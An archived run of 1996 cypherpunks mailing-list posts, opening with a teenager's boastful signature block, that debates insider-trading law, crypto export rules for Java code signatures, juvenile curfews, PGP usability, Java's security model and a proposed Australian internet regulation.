pretty kewl. I'm only 13 and love then they are the drink of the future!!!!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage     Gaa- 3.69
<jwilk@iglou.com>         Record- 2-4-4
Age- 13                   Final Standings- 2nd Place (Beat in Championship)

President & Founder:
                   
Revolution Software       "I have the fastest glove in the east!"
Profanity Software        "Hackers never stop hacking they just get caught"
VSoft

My life- Rarely eat or sleep, Hack til' 7:00a, goto school, play goalie
til' 8:00p, hack til' 7:00a
Hank Aaron- d:-)!-<   Pope- +<:-)   Santa Claus- *<:-) The Unabrower |:-)

Current Girlfriend(s)- Lindsey Wilcox, Laura Schubring

Personal Quote- Mr Plow, thats my name, that name aguin is Mr. Plow 
-Homer Simpson
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 11:55:00 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <2.2.32.19960603200355.0075cc58@popserver.panix.com>
Message-ID: <199606032022.QAA05790@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell writes:
> Though if I trade based on my non public knowledge that the Gray
> Aliens will strike at Midnight on 31 December 1999, I am probably
> safe.

I'm not so sure. If you got access to advance information on
Department of Commerce or Agriculture reports and traded futures based
on them you'd be in sheep dip. I would suggest checking carefully
before trading that way.

On the other hand, it is not against U.S. law to trade non-US
securities, do foreign exchange transactions, etc, based on non-public
information.

> If info that is too far removed is included then any stock analysis
> system would be illegal.

Heh heh heh heh heh.

The laws are vague and are arbitrarily and capriciously
applied. Technical violations happen constantly. One of the mechanisms
of control the SEC has at its disposal is the fact that almost anyone
in the business they choose to target can probably be thrown in jail
for something or other.

> Note BTW that the Feds lost almost all of the '80s insider trading
> cases that actually went to trial.  They only won 2 or 3 that went
> through the full trial and appeals process.  That is a very poor
> record since prosecutors usually have an 80-90% success rate in
> criminal trials.

If you are talking about the trials associated with the Boesky affair,
most defendants plead guilty rather than face multiple lifetimes in
jail. A few defendants were aquitted at trial.  However, convictions
for insider trading are not particularly rare.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 4 Jun 1996 13:31:13 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Java Crypto API questions
Message-ID: <199606032326.QAA09260@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:13 PM 6/3/96 -0400, Simon Spero wrote:
>On Mon, 3 Jun 1996, jim bell wrote:
>> 
>> But you haven't explained why somebody can't export JUST the signature.  You 
>> know, import the software, have Sun sign it domestically, strip off everything that isn't a 
>> signature, and export the signature.  Append it to the un-imported code 
>> outside the country.
>
>Ancillary device... It's pretty clear cut.


Sure about that?  Is a microprocessor an "ancillary device"?  A DRAM module? 
 A hard disk?  How about an operating system, which stores and retrieves 
data for an encryption program?  How about a BIOS?  What about a keyboard?  
A video display?  I think that any definition of "ancillary device" which is 
so broad as to include signatures just about has to include any any of these 
things too, but it won't be considered such because the government has 
already lost the battle on hardware exports.

A signature is just that:  A signature.  It doesn't encrypt or decrypt.  It 
doesn't even ALLOW the system it's in to encrypt or decrypt, because there 
are numerous encryption programs written that have no need for such a 
signature.  If no program existed which _used_ that signature, nobody would 
think twice about exporting it.

The fact is, it is LEGAL to import encryption code into the US.  It is LEGAL 
to generate an hash of that code, and it is LEGAL to export that hash.  To 
believe otherwise is to broadly expand the scope of export laws far beyond 
what they were intended to mean.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 09:41:49 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606031918.PAA15670@jafar.sware.com>
Message-ID: <199606032029.QAA05821@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Barber writes:
> I trust it won't stun you to find that many, many large and even small
> corporations -- including my current employer [*NOT* SecureWare, BTW,
> despite the email address] -- actually encourage their employees to buy
> stock by offering stock purchase plans as a benefit of employment.

Yup. Indeed, its perfectly legal and even common to trade in the stock
of your own company, even if you are a corporate officer. HOWEVER,
that doesn't mean that you are safe against insider trading charges.

> So perhaps Tim over-simplified by saying that there were no limits on
> what ordinary employees could do.  OTOH, it seems that Perry also
> over-simplified by flatly stating that Tim's trades while an Intel
> employee were "illegal".

First of all, I never said that Tim's trades were illegal -- indeed, I
never mentioned Tim except to say that following his advice didn't
seem like a particularly safe course to take. Second of all, I can't
comment on whether Tim's trades were within the letter of the law or
not. Indeed, it would be difficult even if one knew all the
circumstances since the definition of "material non-public
information" is so hard to pin down.

The point of all this was not that one shouldn't participate in the
employee payroll stock purchase plan. The point was that a random
person on the street who gets told a 'hot tip' is probably subject to
the insider trading laws, never mind that he wasn't an employee or
what is conventionally thought to be an "insider".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 4 Jun 1996 10:14:14 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606031523.LAA05288@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.93.960603170014.1502D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Perry E. Metzger wrote:

[...]
> Securities laws are extremely complex, extraordinarily broad, and
> subject to extremely flexible interpretation. I would suggest not
> attempting to skate a fine line near them -- the ice is very thin.

Damn good advice, if you ask me.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm and humid here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Tue, 4 Jun 1996 06:39:08 +0800
To: cypherpunks@toad.com
Subject: [Noisy] More curfews (was Re: opinions on book "The Truth Machine")
Message-ID: <Pine.3.89.9606031621.A13492-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 1 Jun 1996, Adam Back wrote:

> political climate.  Having just read your post on curfews my response
> was what the fuck, are you serious?  It totally amazes me that public
> opinion has got to the stage that something like this would be
> accepted.

Interesting that the day after you posted this the front-page of the UK's
major newspapers carried a story about the Labour party proposing
precisely the same thing in the UK. Of course the cops already have
surveillance cameras all over the place. 

> I'm not sure where I would stand on this legally, but I have so far
> resisted the temptation to tell them it's none of their business.

I tried it a few weeks ago when they stopped me for a random breath test
(illegal as far as I know) after following me for three miles while I
scrupulously obeyed the law. They originally claimed that they had stopped
me randomly, because "that's what I pay them for", but when I questioned
the legality they decided that I'd crossed the centerline while passing a
parked car and therefore must be drunk (even though my car was too wide to
not cross the line). In other words, I don't think they care about the
legal issues. Still, I suppose it's better than being stopped for "driving
at 2:30 in the morning" again. Hmm, who said the UK didn't have a curfew
already? 

> They are I think
> talking about making it law that all target pistols must be kept at
> the gun club (whereas currently you can take them home to clean (but
> not shoot)).

Gun-thieves will love that one. Why steal them one at a time when you can 
steal twenty or thirty in one go?

	Mark "Out of Europe in a few more days" Grant






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Tue, 4 Jun 1996 13:43:46 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <1.5.4.16.19960603232038.32a74aee@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09.59 PM 6/1/96 -0400, Duncan Frissell <frissell@panix.com> wrote:

>I'm afraid that some courts have explicitly held that "the child does not
>have a right to liberty but only a right to custody."  That is old law,
>however.  Kids have lost many rights recently too including gun rights, etc.

I've known for a while that I have no rights as a minor. [ironic smilie]

>Of course curfew laws only control the inarticulate and scruffy.  Well
>dressed children (coat and tie for the boys dress or suit for the girls) who

I'll wear a suit if it means I won't get picked up ... :)

>can claim that they are out doing tons of protected things like work and
>school and worship and political campaigning and "trying to save street
>children for Jesus" will not be picked up.  They can also say things like
>"Ossifer, I'm peaceably assembling to petition the government for redress of
>grievances.  It's in the First Amendment.  You could read about it and
>everything."

You suggest that we minors stand up for ourselves? How odd. I'm sure no one
has ever thought of that before, President Clinton especially. Since any
nationally imposed curfew wouldn't have a leg to stand on in the first place,
this can only improve the situation.

>Home schooled children face this problem frequently and can usually find
>something to say.  Kids older than 15 or so can claim to be "emancipated
>minors."  Parents can emancipate their children by signing a simple
>declaration to back up this claim.  A good idea in any case.

This sounds interesting. What are the particulars of being an emancipated minor?

>"Whose children never got stopped by cops because at 14 they passed for 21.
>Clothing and bearing alone can do it."

I wish I were so lucky. At 15 I seem to pass for ... 12. I guess if the cops
read from right to left ...

- -------------------------------------------------------------------------------
David Rosoff (nihongo o chiisaku dekimasu)                  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
- ---
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." ----- "Ulysses", by Alfred, Lord Tennyson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbNsyxguzHDTdpL5AQGvfwP/f2PDE5JPiczwY/5EFt/ziT9UePbcxCV0
UCbYdkbl9hoNlMphUu+O+zneGntCVOIiEoPZLTpK35TYFgA/MCOQhuiCYnvbInMo
pZlmnTvyoUI1rkHTUzf2cHRg1+18ieJqDDqBqBb58ZxaLxxJ1crUDrL+QHC/QZE9
mAiLT9tnwgc=
=/+GV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Tue, 4 Jun 1996 13:27:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <1.5.4.16.19960603232043.4907661e@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


Quoted text originated from tcmay@got.net

-----BEGIN PGP SIGNED MESSAGE-----

At 07.45 PM 6/1/96 -0700, you wrote:

>Personally, I liked my "religious exemption" example. The Baal worshippers
>can claim that they are engaging in their religion by grokking the
>darkness. If picked up and held, they can claim they are "being held
>without Baal."

Isn't that a little far afield to go for a pun? :)

>Most of the ordinances, including the one here, specifically state that
>"blanket permission" by parents is not acceptable. They want _specific_
>reasons for being out after curfew.

"To whom it may concern:
My son, David Rosoff, is out of our house on this June 3, 1996, Monday night,
to party with friends, cruise Central Avenue, and partake of the spores that
grow of the earth.

Signed,

A. Parent"

>(It's this taking control from both the kids and their parents and putting
>it in the hands of cops that really bugs me.)

"Me too." (Standard non-AOL disclaimer applies.)

>By the way, if being out after curfew is breaking the law, can I make a
>"citizen's arrest" of some of those nice young chicas in Watsonville?

No comment. :) Really.

- -------------------------------------------------------------------------------
David Rosoff (nihongo o chiisaku dekimasu)                  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
- ---
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." ----- "Ulysses", by Alfred, Lord Tennyson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbNtGBguzHDTdpL5AQGK3QQAhX6CSiEr3z8puAhwDYlbayF7dBEUMtsk
DygPCjL2lJ5d//WrEZxKm6ku/PoDDF9NcGqKBlHhuMYzCfEkOzdcv1idQ6lrWoua
ONM3fdGSJt46qplX4UuSQSyLhKqvAwaijw7QDPCAedEFJsVVBPaDT1vpxDOFdylO
UJBwLDjYa4k=
=+KQb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Tue, 4 Jun 1996 13:31:39 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <1.5.4.16.19960603232047.490713e0@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10.23 AM 6/2/96 -0800, jim bell <jimbell@pacifier.com> wrote:

>This, the curfew situation, is yet another of the reasons I'd favor "playing 
>hardball" with the government.  I'm very much against discriminatory 
>enforcement, but on the other hand I don't think my liberty should be 
>dependent on getting an organization like the ACLU to look out for and 
>complain against discrimination against me. 

Are you then also in favor of killing, ruthlessly and brutally, not to
mention somewhat randomly, both the police and the ACLU?

- -------------------------------------------------------------------------------
David Rosoff (nihongo o chiisaku dekimasu)                  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
- ---
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." ----- "Ulysses", by Alfred, Lord Tennyson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbNx2xguzHDTdpL5AQE6bgQAreE5ikGCKxsyjue0fEcKWtmmGU6o2WiU
zTXD2Py8y395NVQFuSlrnWSJ4eKmIpePv1oZjgd7sE9wcpKjhHwHq2Fs/ZmsdEb2
CZxPY1qexpxolo0k8uFNbWvqxs/3ieOa0BzE7jmp0jyopejq2OjXheE1v3zGGKtt
OBSb4vADydw=
=X8Zs
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Tue, 4 Jun 1996 10:44:06 +0800
To: cypherpunks@toad.com
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <ADD8D05B-64C27@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 3 Jun 1996, TT <apache@quux.apana.org.au> wrote:
>I think it is actually easy to use, although granted others may not; but 
>that people tend not to use it as a matter of course (and it is my belief 
>this is a desireable thing) due too the time taken to manually sign mail 
>or sign and encrypt. Lets face it the average user has trouble with a 
>dos command prompt and until there is a point and click emailer easily 
>available most people just won't try PGP for email. 

Most people I have encountered don't use PGP because of the initial
learning curve, more than the overall ease of use.  I work in a small
office that is separate from corporate HQ.  I have been trying for over a
year to convince people to use PGP for intra-office communication.  What I
have found is that for people within the office, it is fairly easy -
hands-on instruction works well.  Convincing folks at HQ has been a royal
pain however.  Most of the problem appears to be the "you mean I have to
learn new software?" variety.  Once I have coached someone over the
"knowledge hump" (often by phone), they tell me that using pgp is pretty
easy.  <disclaimer> We use Eudora Light for the Mac, YMMV </disclaimer>. 
The trick is convincing the user that the benefits associated with using
pgp are greater than the initial pain.  This is something I have only
accomplished with a few people.  

This educational process will continue to be the stumbling block for
widespread use until there is truly seamless encryption.  My fear is that
seamless encryption will be weak; witness the widespread use of 40bit
Netscape and the supposedly 40bit default behavior for S/MIME.  I think
that export controls are a driver towards weak defaults.

OK, that last part was a WA tangent from my "ease of using pgp" thread. 
It's late and I'm hungry.  Sue me.

	Later,
	Clay


---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 4 Jun 1996 13:10:12 +0800
To: ichudov@algebra.com
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <199606022242.RAA19983@manifold.algebra.com>
Message-ID: <Pine.SV4.3.91.960603173332.27162B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


US SEcret Service was always on top of criminal counterfeiting. I make 
that "criminal" distinction becaue there is allegedly a phenomenon of  
low-intensity-warfare going on, with Iran sponsoring more-or-less perfect 
counterfeits of hundred dollar bills.

Criminal counterfeiting was a dangerous game. Secret Service pretty much
knew every individuial/company who was involved in bona fide use of the
relevant papers, inks, engraving/printing equipments, etc., and anyone
ordering any of this stuff from the very limited number of suppliers, was
placed under watch. It's a small world out there, kids.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com
Date: Tue, 4 Jun 1996 13:51:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606040043.RAA17449@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


list cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Tue, 4 Jun 1996 13:38:14 +0800
To: cypherpunks@toad.com
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <199606040047.RAA12318@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Well for crypto-novices that use Windows, I'm hoping life will get a whole
lot easier.

I'm putting the finishing touches on the next release of Private Idaho
(http://www.eskimo.com/~joelm/pi.html).  Aside from some new "power-user"
options (working with Lance to support a DOS version of Mixmaster), the next
release is going to be targeted at all those folks who are intimidated by
PGP.  This includes features like an auto-install app, expert and novice
modes, and a series of wizards for stepping the user through common tasks
(I'm sure the name "wizards" is trademarked by MS, so they won't be called
that).  Also included will be something called PGP QuickStart.  This utility
will hand-hold a user through the entire process of downloading PGP from the
Net, and installing and configuring it.

I just wrote an essay for one of the on-line magazines on "unintentional
crypto-elitism."  One of my points was that decent crypto technology is now
in place, and one of the next evolutionary steps towards wide-scale
acceptance is implementing simple and easy user interfaces.  Developers of
public domain and commercial crypto apps really need to take this to heart.

Joel

BTW - I'm guessing Private Idaho version 2.7 will be available within the
next two weeks.  Send me e-mail (joelm@eskimo.com) with PI_LIST as the
subject to get on the notification list (people on the list will be able to
download about a week or so before it goes into wide-scale release).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com
Date: Tue, 4 Jun 1996 13:28:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606040046.RAA17821@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ncr terminals are the most 31173 D0Dz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 4 Jun 1996 11:48:28 +0800
To: br@doppio.Eng.Sun.COM (Benjamin Renaud)
Subject: Re: Java Crypto API questions
In-Reply-To: <199606031746.KAA01680@springbank.eng.sun.com>
Message-ID: <9606032248.AA00623@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Benjamin Renaud br@doppio.eng.sun.com writes:
>  Policies are statements like:
>
>  "code endorsed by any one of the following signatures (say
>  three of my friends) can access the public part of my file
>  system"
>
>  This is hard. It's probably not going to make it in the first
>  release.  The simple first pass is to say "code signed by x,
>  y, and z" can do whatever it wants.

Good thing Sun is spending millions pushing a brand-new language down our  
throats so we can do nothing we couldn't already do.  After all the hype  
about security, security models, and sandboxes we get signed applets that can  
do anything.  What a let-down.

Currently, the only safe way to run untrusted Java code is to not run it.   
This probably isn't going to change (see cpunks archives for reasons).  If  
Sun cannot prevent untrusted code from doing nasty things, how can they  
prevent code empowered with certain capabilities from doing things they are  
not certified to do?  It now seems that all the effort, time, and money to  
move towards Java over another OO language was a waste in a way since it no  
longer appears to have any security advantages.  Ignoring security, Java is  
not a bad language at all, but it still has distinct disadvantages over some  
of the possible alternatives (mainly immaturity, no dynamic message  
invocation, interpreters still not ready for prime-time).

I wonder if Borland realizes that instead of putting so much time, effort,  
and money into someone else's product, Java, they could have just implemented  
signed Delphi code and gotten basically the same thing.  I guess they didn't  
think of it in time.


You have to hand it to Sun/JavaSoft's marketing team, though.  While others  
have tried, few have been so successful at creating an "industry standard"  
from nothing.  Indeed, the only reason left to use Java is "because everyone  
else is into it..."


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: br@doppio.Eng.Sun.COM (Benjamin Renaud)
Date: Tue, 4 Jun 1996 13:19:48 +0800
To: andrew_loewenstern@il.us.swissbank.com
Subject: Re: Java Crypto API questions
Message-ID: <199606040113.SAA02369@springbank.eng.sun.com>
MIME-Version: 1.0
Content-Type: text/plain




|>  This is hard. It's probably not going to make it in the first
|>  release.  The simple first pass is to say "code signed by x,
|>  y, and z" can do whatever it wants.
|
|Good thing Sun is spending millions pushing a brand-new language down our  
|throats so we can do nothing we couldn't already do.  After all the hype  
|about security, security models, and sandboxes we get signed applets that can  
|do anything.  What a let-down.

Just to clarify a couple of things. We're not pushing anything down
your throat. You are still perfectly free to use Visual C++ if that is
what you prefer. A statement to the effect of "is probably not going to
make it in the first release" means the following things:

- If we can, we will make it happen (in some form) in the first release.
We're just trying to set expectations realistically.

- We think that the ability to let applets have free reign is
useful,and since that is easier, we are certain to put it in the first
release.

- No matter what we do, we must address some very thorny issues of key
management and user trust model, so doing this will be useful. 

|Currently, the only safe way to run untrusted Java code is to not run it.   
|This probably isn't going to change (see cpunks archives for reasons).  If  
|Sun cannot prevent untrusted code from doing nasty things, how can they  
|prevent code empowered with certain capabilities from doing things they are  
|not certified to do?  It now seems that all the effort, time, and money to  
|move towards Java over another OO language was a waste in a way since it no  
|longer appears to have any security advantages.  Ignoring security, Java is  
|not a bad language at all, but it still has distinct disadvantages over some  
|of the possible alternatives (mainly immaturity, no dynamic message  
|invocation, interpreters still not ready for prime-time).

The important thing to remember is that we're not going to come out
with an implementation and claim to have solved the capabilities model
problem.

We're taking a first step at using signatures with Java for security
purposes, but this is only a first step. We remain fully committed to
finer and more powerful security models. Note that an application
written to the Java platform will be able to implement security
policies based on digital signatures which are not fully permissive.

Cheers,
-- Benjamin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TT <apache@quux.apana.org.au>
Date: Mon, 3 Jun 1996 20:27:08 +0800
To: MailList Cypherpunks <cypherpunks@toad.com>
Subject: The decline and fall of Australia
Message-ID: <Pine.LNX.3.91.960603181731.604E-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


Just in case people on this list were under any delusions that Australia   
part of the free world get a load of this...
 
**begin press release**                      
                       
                       Hon. J.W. Shaw, QC, MLC
         Attorney-General and Minister for Industrial Relations
------------------------------------------------------------------------
Level 20, Goodsell Building,                    Facsimile  (02) 228 7301
Chifley Square, Sydney NSW 2000                 Telephone  (02) 228 8188

------------------------------------------------------------------------

 PAEDOPHILIA SHOULD NOT BE ENCOURAGED BY THE INTERNET


The Attorney General Mr Jeff Shaw, QC, MLC, today explained the draft
internet regulation legislation to members of the internet community who
had apparently misunderstood the plans.

"Despite their protests, those who support total freedom on the internet
have yet to explain to me why material involving paedophilia should be
readily available and encouraged on the internet", he said.

"Those who assert that the proposals are a knee jerk reaction are
completely wrong and appear to have been totally uninterested in the issue
until very recently.  For on 7 July 1995, a consultation paper on internet
regulation was released both on the World Wide Web and in paper form.

"That 'Consultation paper on the Regulation of On-Line Information
Services,' has now been available from the Federal Attorney General's
Department for almost a year.

"When it was released, submissions were requested, and 121 submissions
were received by the closing date of 1 September 1995.

"Following unanimous endorsement of the proposals by all Attorney's
General, the NSW Parliamentary Counsel drafted legislation based on the
discussion paper and the consultation process.  This legislation will be
discussed by the Standing Committee of Attorney's General in July.

"Those protesting about the proposed offences and penalties are
conveniently ignoring half the story - the fact that the draft legislation
creates broad defences that encourage compliance with approved codes of
practice or the taking of reasonable steps to ensure the proscribed
behaviour does not occur.

"Why should a Government not prosecute a service provider who supplies the
Internet to schools, yet refuses to install appropriate firewalls to
screen out material involving explicit sex and violence or child sexual
abuse?

"The broad defences recognise, as I do, the impossibility of monitoring
all data that goes through service providers systems, but encourage
providers to maintain maximum awareness, not maximum ignorance, about the
material disseminated.

"Criminal sanctions are only aimed at operators and users who culpably
breach the standards that are set out regarding material that they transmit
or advertise, or those who fail or refuse to exercise any effective
controls over material that is publicly available through their information
services.

"For example, people who have objectionable material placed on their
bulletin board without their knowledge could argue that they are not liable
as they had obtained undertakings from users that certain types of material
would not be posted or posted inappropriately.  They may also be able to
demonstrate that they had conducted random checks of material available
through their information service.

"I do not believe that the community condones the easy availability of
material encouraging paedophilia and other sexual abuse.  The impossibility
of absolute regulation does not justify a complete failure to do what we
can to meet reasonable concerns.

"I would hope that organisations like the Electronic Frontiers Association
are interested in assisting the State and Federal Governments formulate
workable proposals that will protect children while allowing adults
freedom of expression on the internet.  If they in fact are, detailed
proposals about how this could be best achieved would be useful."

**end**

As to that last para I think u could read..."cos we have no bloody idea
what we are doing or how to achieve this all on our lil lonesomes"

Thank the gods for cypherpunks..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 4 Jun 1996 12:57:03 +0800
To: Michael Froomkin <perry@piermont.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <2.2.32.19960603223725.009fda80@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:01 PM 6/3/96 -0400, Michael Froomkin wrote:
>On Mon, 3 Jun 1996, Perry E. Metzger wrote:
>
>[...]
>> Securities laws are extremely complex, extraordinarily broad, and
>> subject to extremely flexible interpretation. I would suggest not
>> attempting to skate a fine line near them -- the ice is very thin.
>
>Damn good advice, if you ask me.
>
>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)

However, it is becoming a deregulated industry.  Like all the rest.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 4 Jun 1996 11:35:05 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <199606031918.PAA05670@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960603183738.20627A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Perry E. Metzger wrote:

> > There is a simple solution to avoiding liability.  Don't trade in your 
> > own company's stock.
> 
> In reality, of course, you are fairly safe so long as no one is
> looking for your head and you aren't trading based on company
> secrets. However, in theory, its possible to prosecute almost anyone.

Both points conceeded.

> > Such restrictions have existed for decades.  Why are you so stunned?
> 
> I guess this is all obvious to wall streeters like me, who live day to
> day with yellow xeroxed sheets being mass distributed to all employees
> informing us of the names of 150 companies that the firm has had
> peripheral dealings with recently that we aren't allowed to trade for
> some indeterminate period of time. People who don't live in regulatory
> paranoia land often just don't get that the SEC's regulatory authority
> is broad, based on very vague statutes, and capriciously
> applied. Thats reality, folks. I suppose since most people have never
> experienced it they don't understand what it's like....

For facinating discussions of why insider trading is actually good for 
the market, See e.g., Henry Manne, Insider Trading and the Stock Market 
(1966); Michael P. Dooley, Enforcement of Insider Trading Restrictions, 66 
Va.L.Rev 1 (1980); James D. Cox, Insider Trading and Contracting: A 
Critial Response to the "Chicago School," 1986 Duke L.J. 628 (1986); 
Kenneth E. Scott, Insider Trading: Rule 10b-5, Disclosure and Corporate 
Privacy, 9 J. Legal Stud. 801 (1980); Dennis W. Carlton & Daniel R. 
Fischel, The Regulation of Insider Trading, 35 Stan.L.Rev 857 (1983).

I'll sum up the general arguments for and against insider trading if 
there is enough interest.

> Perry

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 4 Jun 1996 13:26:22 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Java Crypto API questions
In-Reply-To: <199606031746.KAA01680@springbank.eng.sun.com>
Message-ID: <31B37DBA.5C8B@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Loewenstern wrote:

> >  This is hard. It's probably not going to make it in the first
> >  release.  The simple first pass is to say "code signed by x,
> >  y, and z" can do whatever it wants.
> 
> Good thing Sun is spending millions pushing a brand-new language down our
> throats so we can do nothing we couldn't already do. 

How can you do this currently?  (With applets in browsers, I mean.)

> After all the hype about security, security models, and sandboxes we get
